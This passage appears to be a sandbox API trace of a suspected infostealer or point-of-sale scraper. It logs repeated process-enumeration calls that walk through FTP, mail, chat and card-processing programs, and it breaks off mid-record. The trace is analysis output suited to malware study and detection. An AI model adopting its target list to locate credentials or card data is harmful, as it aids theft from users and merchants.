[0163.648] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0163.651] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0163.653] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0163.656] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0163.751] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0163.754] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0163.757] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0163.759] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0163.763] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0163.765] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0163.768] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0163.771] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0163.773] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0163.776] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0163.779] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0163.781] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0163.784] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0163.790] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0163.793] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0163.796] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0163.801] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0163.804] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0163.806] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0163.808] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0163.810] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0163.813] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0163.815] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0163.818] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0163.820] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0163.823] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0163.825] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0163.829] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0163.832] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0163.834] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0163.837] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0163.840] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0163.843] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0163.845] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0163.847] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0163.850] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0163.853] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0163.855] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0163.857] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0163.859] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0163.862] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0163.864] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.871] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0163.874] CloseHandle (hObject=0x1cec) returned 1 [0163.874] Sleep (dwMilliseconds=0x64) [0163.986] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dfc [0164.000] Process32First (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.002] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0164.004] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0164.007] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.009] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0164.012] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.014] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0164.016] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0164.018] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0164.021] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.063] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.065] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0164.068] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.070] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.072] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.075] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.077] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.079] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.082] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.084] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0164.086] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0164.088] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0164.090] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0164.093] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.097] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0164.099] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0164.147] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0164.149] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0164.152] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0164.154] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0164.159] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.162] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0164.164] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0164.166] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0164.169] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0164.171] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.173] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, 